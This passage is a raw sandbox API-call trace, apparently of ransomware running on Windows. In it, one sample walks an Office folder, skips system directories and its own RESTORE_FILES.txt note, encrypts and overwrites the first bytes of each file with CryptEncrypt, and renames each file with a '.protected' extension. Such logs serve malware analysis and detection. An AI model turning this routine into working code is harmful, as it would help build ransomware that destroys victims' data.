[0068.079] lstrcmpW (lpString1="PUBWZINT.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0068.079] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.080] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.080] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pubwzint.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.083] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll") returned 73 [0068.083] StrStrW (lpFirst="PUBWZINT.REST.trx_dll", lpSrch=".txt") returned 0x0 [0068.083] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll") returned 73 [0068.083] StrStrW (lpFirst="PUBWZINT.REST.trx_dll", lpSrch=".rar") returned 0x0 [0068.083] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll") returned 73 [0068.083] StrStrW (lpFirst="PUBWZINT.REST.trx_dll", lpSrch=".zip") returned 0x0 [0068.083] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.088] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.088] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.089] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.089] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.267] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.268] CloseHandle (hObject=0xd8) returned 1 [0068.268] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll.protected") returned 83 [0068.268] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pubwzint.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pubwzint.rest.trx_dll.protected")) returned 1 [0068.269] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.269] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="Windows") returned -1 [0068.269] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="Program Files") returned 1 [0068.269] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0068.269] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.269] lstrcmpiW (lpString1="SGRES.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0068.269] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll") returned 69 [0068.269] StrStrIW (lpFirst="SGRES.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0068.269] lstrcmpW (lpString1="SGRES.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0068.269] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.269] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.269] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\sgres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.348] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll") returned 69 [0068.348] StrStrW (lpFirst="SGRES.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0068.348] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll") returned 69 [0068.348] StrStrW (lpFirst="SGRES.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0068.348] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll") returned 69 [0068.348] StrStrW (lpFirst="SGRES.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0068.348] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.367] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.367] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.368] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.368] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.375] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.375] CloseHandle (hObject=0xd8) returned 1 [0068.376] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll.protected") returned 79 [0068.376] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\sgres.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\SGRES.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\sgres.dll.trx_dll.protected")) returned 1 [0068.376] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.376] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="Windows") returned -1 [0068.376] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="Program Files") returned 1 [0068.376] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0068.376] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.376] lstrcmpiW (lpString1="STINTL.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0068.376] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll") returned 70 [0068.376] StrStrIW (lpFirst="STINTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0068.376] lstrcmpW (lpString1="STINTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0068.376] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.377] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.377] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\stintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.378] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll") returned 70 [0068.378] StrStrW (lpFirst="STINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0068.378] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll") returned 70 [0068.378] StrStrW (lpFirst="STINTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0068.378] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll") returned 70 [0068.378] StrStrW (lpFirst="STINTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0068.378] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.383] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.383] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.383] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.383] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.383] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.383] CloseHandle (hObject=0xd8) returned 1 [0068.384] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll.protected") returned 80 [0068.384] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\stintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\STINTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\stintl.dll.trx_dll.protected")) returned 1 [0068.385] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.385] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="Windows") returned -1 [0068.385] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="Program Files") returned 1 [0068.385] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0068.385] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.385] lstrcmpiW (lpString1="VISBRRES.DLL.trx_dll", lpString2="System Volume Information") returned 1 [0068.385] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll") returned 72 [0068.385] StrStrIW (lpFirst="VISBRRES.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0068.385] lstrcmpW (lpString1="VISBRRES.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0068.385] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.385] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.385] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visbrres.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.386] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll") returned 72 [0068.386] StrStrW (lpFirst="VISBRRES.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0068.386] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll") returned 72 [0068.386] StrStrW (lpFirst="VISBRRES.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0068.386] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll") returned 72 [0068.386] StrStrW (lpFirst="VISBRRES.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0068.386] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.413] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.413] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.414] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.414] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.420] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.420] CloseHandle (hObject=0xd8) returned 1 [0068.420] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll.protected") returned 82 [0068.420] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visbrres.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISBRRES.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visbrres.dll.trx_dll.protected")) returned 1 [0068.422] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.422] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="Windows") returned -1 [0068.422] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="Program Files") returned 1 [0068.422] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0068.422] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.422] lstrcmpiW (lpString1="VISINTL.DLL.trx_dll", lpString2="System Volume Information") returned 1 [0068.422] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll") returned 71 [0068.422] StrStrIW (lpFirst="VISINTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0068.422] lstrcmpW (lpString1="VISINTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0068.422] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.422] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.422] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.422] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll") returned 71 [0068.422] StrStrW (lpFirst="VISINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0068.422] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll") returned 71 [0068.422] StrStrW (lpFirst="VISINTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0068.422] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll") returned 71 [0068.422] StrStrW (lpFirst="VISINTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0068.423] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.463] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.463] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.557] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.557] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.558] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.558] CloseHandle (hObject=0xd8) returned 1 [0068.559] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll.protected") returned 81 [0068.559] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\VISINTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\visintl.dll.trx_dll.protected")) returned 1 [0068.687] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.687] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="Windows") returned 1 [0068.687] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="Program Files") returned 1 [0068.687] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0068.687] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.687] lstrcmpiW (lpString1="WWINTL.DLL.trx_dll", lpString2="System Volume Information") returned 1 [0068.688] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll") returned 70 [0068.688] StrStrIW (lpFirst="WWINTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0068.688] lstrcmpW (lpString1="WWINTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned 1 [0068.688] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.688] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.688] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.688] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll") returned 70 [0068.688] StrStrW (lpFirst="WWINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0068.693] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll") returned 70 [0068.693] StrStrW (lpFirst="WWINTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0068.693] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll") returned 70 [0068.694] StrStrW (lpFirst="WWINTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0068.694] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.708] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.708] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.708] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.708] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.709] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.709] CloseHandle (hObject=0xd8) returned 1 [0068.725] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll.protected") returned 80 [0068.725] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\wwintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\WWINTL.DLL.trx_dll.protected" (normalized: 